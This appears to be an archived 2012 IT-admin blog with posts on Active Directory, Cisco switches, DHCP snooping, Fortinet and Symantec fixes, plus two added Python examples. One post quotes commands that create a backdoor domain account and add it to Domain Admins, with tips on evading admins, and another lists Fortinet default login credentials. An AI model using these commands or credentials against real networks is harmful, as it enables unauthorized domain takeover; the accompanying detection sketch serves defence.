Wednesday, July 25, 2012

Active Directory : You do not have sufficient privileges to delete Organizational Unit

Step 1:
Click View > Advanced Features.

Step 2:
Right-click the OU you want to remove, then click Properties.
Click the Object tab.
Uncheck the box Protect object from accidental deletion.

Tuesday, July 17, 2012

Configure Cisco switch telnet login and password

1.) Connect the console cable.
2.) Use a terminal emulation program to connect to the switch or router. The default settings should be: Bits Per Second: 9600, Data Bits: 8, Parity: None, Stop Bits: 1, Flow Control: None. Then connect.
3.) Enter privileged EXEC mode by typing enable. A “>” prompt indicates user mode; a “#” prompt indicates privileged EXEC mode.
4.) Enter global configuration mode by typing configure terminal (or config t for short) while in privileged EXEC mode.
5.) Type line vty 0 15 (virtual terminal lines 0 through 15, 16 in all). You can set different passwords for different vtys; the range does not have to be 0 15.
6.) Type password *password*, replacing the text between the asterisks with the password you want to set.

DHCP Snooping


DHCP snooping acts like a firewall between untrusted hosts and DHCP servers. You use DHCP snooping to differentiate between untrusted interfaces connected to the end user and trusted interfaces connected to the DHCP server or another switch. When a switch receives a packet on an untrusted interface and the interface belongs to a VLAN that has DHCP snooping enabled, the switch compares the source MAC address and the DHCP client hardware address. If the addresses match (the default), the switch forwards the packet. If the addresses do not match, the switch drops the packet. The switch drops a DHCP packet when one of these situations occurs:
- A packet from a DHCP server, such as a DHCPOFFER, DHCPACK, DHCPNAK, or DHCPLEASEQUERY packet, is received from outside the network or firewall.
- A packet is received on an untrusted interface, and the source MAC address and the DHCP client hardware address do not match.
- The switch receives a DHCPRELEASE or DHCPDECLINE broadcast message that has a MAC address in the DHCP snooping binding database, but the interface information in the binding database does not match the interface on which the message was received.
- A DHCP relay agent forwards a DHCP packet, which includes a relay-agent IP address that is not 0.0.0.0, or the relay agent forwards a packet that includes option-82 information to an untrusted port.
Refer to DHCP Snooping Configuration Guidelines for the guidelines on how to configure DHCP snooping.
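
The drop rules above, expressed as a small decision function and run over constructed packets. This is an added example, not Cisco's implementation and not part of the original post; the `Packet` fields, the server MAC address, the relay address 10.0.0.254 and the reading of "outside the network" as "any untrusted interface" are assumptions made for illustration.

```python
# Added illustration of the drop rules listed above (not Cisco's code).
from dataclasses import dataclass

SERVER_TYPES = {"DHCPOFFER", "DHCPACK", "DHCPNAK", "DHCPLEASEQUERY"}

@dataclass
class Packet:
    msg_type: str
    src_mac: str              # Ethernet source MAC address
    chaddr: str               # DHCP client hardware address
    ingress: str              # interface the packet arrived on
    giaddr: str = "0.0.0.0"   # relay-agent IP address
    option82: bool = False    # option-82 information present

def verdict(pkt, trusted, bindings):
    """Return (forwarded, reason); bindings maps client MAC -> interface."""
    if pkt.ingress in trusted:
        return True, "trusted interface"
    if pkt.msg_type in SERVER_TYPES:
        return False, "server message on untrusted interface"
    if pkt.src_mac.upper() != pkt.chaddr.upper():
        return False, "source MAC and client hardware address differ"
    if pkt.msg_type in ("DHCPRELEASE", "DHCPDECLINE"):
        bound = bindings.get(pkt.chaddr.upper())
        if bound is not None and bound != pkt.ingress:
            return False, "binding interface mismatch"
    if pkt.giaddr != "0.0.0.0" or pkt.option82:
        return False, "relay information on untrusted interface"
    return True, "passed all checks"

# Constructed sample data modelled on the Cat3750 output on this page.
TRUSTED = {"FastEthernet1/0/3"}
PC1, PC2, SRV = "00:11:85:A5:7B:F5", "00:11:85:8D:9A:F9", "00:AA:BB:CC:DD:01"
BINDINGS = {PC1: "FastEthernet1/0/1", PC2: "FastEthernet1/0/2"}
SAMPLES = [
    Packet("DHCPOFFER", SRV, PC1, "FastEthernet1/0/3"),     # real server
    Packet("DHCPOFFER", PC2, PC1, "FastEthernet1/0/2"),     # reply from a host port
    Packet("DHCPDISCOVER", PC1, PC2, "FastEthernet1/0/1"),  # MAC / chaddr mismatch
    Packet("DHCPRELEASE", PC1, PC1, "FastEthernet1/0/2"),   # wrong port for binding
    Packet("DHCPDISCOVER", PC1, PC1, "FastEthernet1/0/1", giaddr="10.0.0.254"),
    Packet("DHCPREQUEST", PC1, PC1, "FastEthernet1/0/1"),   # ordinary client
]

def run_samples():
    return [verdict(p, TRUSTED, BINDINGS) for p in SAMPLES]

if __name__ == "__main__":
    for pkt, (ok, why) in zip(SAMPLES, run_samples()):
        print(f"{pkt.msg_type:13} {pkt.ingress:18} {'forward' if ok else 'drop':8} {why}")
```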

Note: For DHCP snooping to function properly, all DHCP servers must be connected to the switch through trusted interfaces.

Note: In a switch stack with Catalyst 3750 Switches, DHCP snooping is managed on the stack master. When a new switch joins the stack, the switch receives DHCP snooping configuration from the stack master. When a member leaves the stack, all DHCP snooping bindings associated with the switch age out.

Note: In order to ensure that the lease time in the database is accurate, Cisco recommends that you enable and configure NTP. If NTP is configured, the switch writes binding changes to the binding file only when the switch system clock is synchronized with NTP.

Rogue DHCP servers can be mitigated by DHCP snooping features. The ip dhcp snooping command is issued in order to enable DHCP snooping globally on the switch. When configured with DHCP snooping, all ports in the VLAN are untrusted for DHCP replies. Here, only the FastEthernet interface 1/0/3 connected to the DHCP server is configured as trusted.

DHCP Snooping
Cat3750#conf t
Enter configuration commands, one per line.  End with CNTL/Z.
Cat3750(config)#ip dhcp snooping

!--- Enables DHCP snooping on the switch.

Cat3750(config)#ip dhcp snooping vlan 1

!--- DHCP snooping is not active until DHCP snooping is enabled on a VLAN.

Cat3750(config)#no ip dhcp snooping information option

!--- Disable the insertion and removal of the option-82 field, if the
!--- DHCP clients and the DHCP server reside on the same IP network or subnet.

Cat3750(config)#interface fastEthernet 1/0/3
Cat3750(config-if)#ip dhcp snooping trust

!--- Configures the interface connected to the DHCP server as trusted.

Cat3750#show ip dhcp snooping
Switch DHCP snooping is enabled
DHCP snooping is configured on following VLANs:
1
Insertion of option 82 is disabled
Option 82 on untrusted port is not allowed
Verification of hwaddr field is enabled
Interface                    Trusted     Rate limit (pps)
------------------------     -------     ----------------
FastEthernet1/0/3            yes         unlimited

!--- Displays the DHCP snooping configuration for the switch.

Cat3750#show ip dhcp snooping binding
MacAddress          IpAddress        Lease(sec)  Type           VLAN  Interface
------------------  ---------------  ----------  -------------  ----  --------------------
00:11:85:A5:7B:F5   10.0.0.2         86391       dhcp-snooping  1     FastEthernet1/0/1
00:11:85:8D:9A:F9   10.0.0.3         86313       dhcp-snooping  1     FastEthernet1/0/2
Total number of bindings: 2

!--- Displays the DHCP snooping binding entries for the switch.

Cat3750#

!--- DHCP server(s) connected to the untrusted port will not be able
!--- to assign IP addresses to the clients.

Refer to Configuring DHCP Features for more information.

Monday, July 16, 2012

Fortinet Default Account

User Name    Password        Description
----------   -------------   --------------------------------------------------
admin        (none)          Admin access (Telnet)
maintainer   bcpb+serial#    Admin access (Console); serial# has to be in caps
maintainer   admin           Admin access (Console)


ref: http://www.default-password.info/fortinet/

Fortigate Command - Setting back to factory defaults using the console cable

Connect with a terminal program (like HyperTerminal or PuTTY) using these settings:
8 bits
no parity
1 stop bit
9600 baud (the FortiGate-300 uses 115,000 baud)
Flow Control = None

Log in as admin (perhaps with no password, perhaps with a password you set).

Run this from the CLI:
exec factoryreset

ref: http://t-solve.blogspot.hk/2010/06/setting-fortigate-back-to-factory.html

Symantec Communications Brief - Symantec Customers Experiencing Blue Screen Issues


Dear Customers,


On the night of 11 July, we found a defect in SEP 12.1 VD, which might cause a Blue Screen Of Death issue on some Win XP machines.

Below is the whole story, how to avoid the issue, and the workaround, for your reference.


Problem
On July 11th, 2012 at approximately 22.30 PST, Symantec started receiving reports of customers experiencing blue screens after applying Antivirus Definitions July 11th revision 18 and Proactive Threat Protection Definitions July 11th rev 11. Machines may continue to blue screen after they reboot. This problem only appears to occur on Windows XP machines running SEP 12.1.
Error
Blue screen (BSOD) with code 0x000000CB after installing the definitions from 11/07/2012 rev. 11 or rev. 18
Environment
SEP 12.1 Systems on Windows XP 32 bit and 64 bit
Cause
Symantec has reproduced the problem and is now trying to identify the root cause. We have posted updated signatures which resolve the issue to the public LiveUpdate production servers.
Solution
Symantec has posted updated signatures which resolve the issue to the public LiveUpdate production servers. To work around the issue please follow these steps on the impacted machines.
For Enterprise customers, make sure you have updated to the latest virus definitions on the Symantec Endpoint Protection Manager (SEPM):
1. Open the Symantec Endpoint Protection Manager
2. Login
3. Select "Admin"
4. Select "Local site"
5. Select "Download LiveUpdate content"

On affected client machines running Symantec Endpoint Protection 12.1:
1. Start computer in safe mode
2. Navigate to the Symantec Endpoint Protection definition directory: C:\Documents and Settings\All Users\Application Data\Symantec\Symantec Endpoint Protection\CurrentVersion\Data\Definitions\BASHDefs
3. Delete the latest content directory (should be 20120711.011)
4. Reboot

Note: If the client is pulling down content from LiveUpdate or LiveUpdate Administrator, please run LiveUpdate. If the client is pulling down content from the SEPM, the content will be automatically downloaded without any interaction. Until the content is delivered, the client UI may show with a warning due to missing content.
When the system has been updated properly, in the client user interface for Proactive Threat Protection the definition versions will be Wednesday, July 11, 2012 r12.


Thanks & Regards,
Linda


Thursday, July 12, 2012

How to attack a windows domain

Code:
C:\net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.
 
The command completed successfully.
Now we want to add our account to the domain admin group. NOTE: often you don’t want to add an account, especially one named hacked as it is likely to be discovered by the admins.
At this point we have control over the domain and can likely log into any workstation which is on the domain.
Code:
C:\net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The request will be processed at a domain controller for domain blackhat.com
 
The command completed successfully.
ref: http://www.coresec.org/2011/03/27/how-to-attack-a-windows-domain/
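
From the defender's side, the two commands above leave a recognisable pair of records in the domain controller's Security log: event 4720 (a user account was created) followed by event 4728 (a member was added to a security-enabled global group) for Domain Admins. The following is an added detection example, not part of the original post; the records are constructed, reduced to a few EventData fields and assumed to be already parsed into dictionaries, and the SIDs, actor names and 24-hour window are assumptions.

```python
# Added detection sketch: flag additions to Domain Admins, and raise the
# severity when the added account was itself created shortly before.
from datetime import datetime, timedelta

PRIVILEGED_GROUPS = {"domain admins"}
WINDOW = timedelta(hours=24)   # assumed correlation window

# Constructed sample records (simplified from Security events 4720 / 4728).
EVENTS = [
    {"time": "2012-07-12T10:00:05", "id": 4720, "SubjectUserName": "svc_web",
     "TargetUserName": "hacked", "TargetSid": "S-1-5-21-1-2-3-1601"},
    {"time": "2012-07-12T10:01:10", "id": 4728, "SubjectUserName": "svc_web",
     "TargetUserName": "Domain Admins", "MemberSid": "S-1-5-21-1-2-3-1601"},
    {"time": "2012-07-12T11:00:00", "id": 4728, "SubjectUserName": "alice.adm",
     "TargetUserName": "Helpdesk", "MemberSid": "S-1-5-21-1-2-3-1400"},
    {"time": "2012-07-12T12:00:00", "id": 4728, "SubjectUserName": "alice.adm",
     "TargetUserName": "Domain Admins", "MemberSid": "S-1-5-21-1-2-3-1200"},
]

def find_alerts(events):
    created = {}   # TargetSid -> (creation time, account name)
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["TargetSid"]] = (when, ev["TargetUserName"])
        elif ev["id"] == 4728 and ev["TargetUserName"].lower() in PRIVILEGED_GROUPS:
            born = created.get(ev["MemberSid"])
            fresh = born is not None and when - born[0] <= WINDOW
            alerts.append({
                "time": ev["time"],
                "severity": "high" if fresh else "review",
                "group": ev["TargetUserName"],
                "member": born[1] if born else ev["MemberSid"],
                "actor": ev["SubjectUserName"],
            })
    return alerts

if __name__ == "__main__":
    for alert in find_alerts(EVENTS):
        print(alert)
```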

Friday, July 6, 2012

Windows 7 Does Not Detect My DVD ROM Drive

To do this, follow these steps:
  1. Open the registry for editing (Regedit.exe).
  2. Locate, and then click the following registry subkey:
    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\{4D36E965-E325-11CE-BFC1-08002BE10318}
    Caution
    To make sure that you are in the appropriate registry subkey, make sure that the Default data value is DVD/CD-ROM and the Class data value is CDROM.

  3. In the right pane, right-click UpperFilters, and then click Delete.
  4. Click Yes to confirm the removal of the UpperFilters registry entry.
  5. Do the same for the LowerFilters entry.
  6. Exit Registry Editor, and then restart the computer.
That's it. The CD/DVD drive should now be working as expected.